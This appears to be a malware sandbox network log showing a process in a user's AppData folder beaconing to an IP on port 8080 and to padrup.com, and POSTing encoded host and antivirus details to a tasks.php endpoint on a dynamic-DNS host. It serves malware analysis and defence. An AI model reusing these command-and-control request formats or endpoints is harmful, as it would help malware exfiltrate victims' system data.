X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_FGPkNgzuMlVV0WjFxTmUVgbDr6/1tb0/q6HFTnEeTW3o9b2vPClHKxFOPS+T5VPTLGoAItP2hRuh6AaSLPtNcQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
Data Raw: 38 64 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 8d9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:43:01.755389929 CEST | 212 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE4MS40MTM2OjFmZWJlMzc1ZTI3OWEzNDZkNmM3YjExNWJjY2RhNmE5Y2FkYzY4YmQxYTUwOTVkYmJmZTcwOTRmYzN
Oct 18, 2024 12:43:01.755400896 CEST | 1236 | IN | Data Raw: 6c 59 6a 45 78 4f 44 63 36 4e 6a 63 78 4d 6a 4e 69 59 6a 55 32 4e 47 5a 68 4d 67 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72
Data Ascii: lYjExODc6NjcxMjNiYjU2NGZhMg==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';
Oct 18, 2024 12:43:01.755737066 CEST | 545 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32
Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123bb5&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '61f0d492f43a2d0fb5a231619d68ec6c20851280');</script><script t


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.9 | 49814 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:43:01.812066078 CEST | 169 | OUT | GET /sobakavolos.gif?12d42dc2=947685702 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.9 | 49835 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:43:06.057049990 CEST | 158 | OUT | GET /sobaka1.gif?13de3bbe=-1294984786 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:43:07.131195068 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:43:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_YlHPAEDLjHgH/k1drjXlD7FkUTytL5GSlTdUlK0r8tS7xBT9CzAcy7yEiiHmFlCsUgd1jP4461vCVpL9EYg7jg==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:43:07.131222963 CEST | 224 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE4Ni43ODkxOjE5MWJiOTk1MDNhNzllMTAyOTU5MmZiNDY3NmVjNjg1ZTk4NzhkMDVhN2YzOTU0MTA0MTk2NTk2N2E3MGE0ZTk6Njc
Oct 18, 2024 12:43:07.131232023 CEST | 1236 | IN | Data Raw: 78 4d 6a 4e 69 59 6d 46 6a 4d 47 45 32 4e 67 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
Data Ascii: xMjNiYmFjMGE2Ng==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
Oct 18, 2024 12:43:07.131335020 CEST | 540 | IN | Data Raw: 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 33 62 62 62 26 74 6f 6b 65 6e 3d 27
Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123bbb&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '7c57f1d970952c2b5dfebe45757a591781462dd4a0e');</script><script type='


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.9 | 49842 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:43:07.398519039 CEST | 171 | OUT | GET /sobakavolos.gif?140deb53=-1939771579 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.9 | 49861 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:43:11.935051918 CEST | 156 | OUT | GET /sobaka1.gif?1495f698=690744624 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:43:12.995506048 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:43:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_AScvsugINVI061Jl9qEAQC52h8opQq+tj9GFiE+5k81eQaQ82r7QsN18fpV5YaRtidkmVLh1qq98EM30sSHXNQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:43:12.995536089 CEST | 1236 | IN | Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE5Mi42MzU3OmY5OGYxNjExYTRlMTA2ZDdiMGMyYjIyNzE2OWMxNDUyNmU4ODg2OGZjYzE5OTcyMzEzYWYxNDIxZGQ4YWJjMGU6NjcxMjNiYzA5YjMyNg==';
Oct 18, 2024 12:43:12.995548964 CEST | 424 | IN | Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 12:43:12.995587111 CEST | 340 | IN | Data Ascii: 14620842d2');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.9 | 49867 | 194.5.152.215 | 80 | 7352 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:43:12.696280003 CEST | 453 | OUT | POST /n/tasks.php HTTP/1.0
Host: n.ddnsgratis.com.br
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/38.0
Content-type: application/x-www-form-urlencoded
Cookie: auth=bc00595440e801f8a5d2a2ad13b9791b
Content-length: 192
Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=
Oct 18, 2024 12:43:18.796395063 CEST | 606 | IN | HTTP/1.1 404 Not Found
Date: Fri, 18 Oct 2024 10:43:13 GMT
Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14
X-Powered-By: PHP/5.6.14
Status: 404 Not Found
Content-Length: 377
Content-Type: text/html; charset=utf8
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>...-MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.9 | 49870 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:43:13.535052061 CEST | 170 | OUT | GET /sobakavolos.gif?14b59e3b=1737234215 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.9 | 49889 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:43:18.817353964 CEST | 156 | OUT | GET /sobaka1.gif?1543ef95=713547562 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:43:19.906209946 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:43:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_ufXfoUdp3WxsGAxMbGw9b896SYqSv9ARdvAfmXJYbERAv5WSAOEjUu6nR1shCU/oKjRTxm33BxZd3vpahr9CoQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 31 65 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 1eb<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.906275988 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODE5OS41MzI0OjQ0OTcwNWJlOTdhZDYxOGIyM2YzNDc1N2I3MGNjMmZjYjA4YmM1YThkZDgxNGM2ZGFhZTUyN2JhNTN6eehZjg2YTY6NjcxMjNiYzc4MWY
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.906290054 CEST764INData Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
36          192.168.2.9  49899        190.120.227.91  8080              800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 12:43:19.929708004 CEST  170                OUT        GET /sobakavolos.gif?15aba7b5=-659256046 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
37          192.168.2.9  49918        185.53.178.50   80                800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 12:43:24.627928972 CEST  157                OUT        GET /sobaka1.gif?16b31880=-867443584 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:43:25.649245977 CEST  1236               IN         HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:43:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_DY9Bxe9I4m2z6CYnWRuosCOfH7OTCfbUl+gMaMc9pr6m6mFTq53CVshB6OYbkAvf3TXxyGW6Yi5J3c/jbcNsJg==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:43:25.649267912 CEST  224                IN         Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODIwNS4zMDg2OjRhN2JjNDVkNjY2YWJlZDAwZDQ1ZWU0ZmJiOTA3ZDcwODc3NmViZjI1ZDllZWNjODM3MDFlZjc5MTM5NDRhMWY6Njc
Oct 18, 2024 12:43:25.649439096 CEST  1236               IN         Data Raw: 78 4d 6a 4e 69 59 32 51 30 59 6a 55 34 4d 41 3d 3d 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77 20 3d 20 27 27 3b 0a 76
Data Ascii: xMjNiY2Q0YjU4MA==';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</script>
Oct 18, 2024 12:43:25.649525881 CEST  540                IN         Data Raw: 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 33 62 63 64 26 74 6f 6b 65 6e 3d 27
Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123bcd&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '6a3ab73d558d4e0815787719552036e77146d92a081');</script><script type='


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
38          192.168.2.9  49927        190.120.227.91  8080              800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 12:43:27.471786022 CEST  170                OUT        GET /sobakavolos.gif?16d8692d=1149844359 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.9 | 49949 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:43:32.202161074 CEST | 158 | OUT | GET /sobaka1.gif?1781559f=-1928855110 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
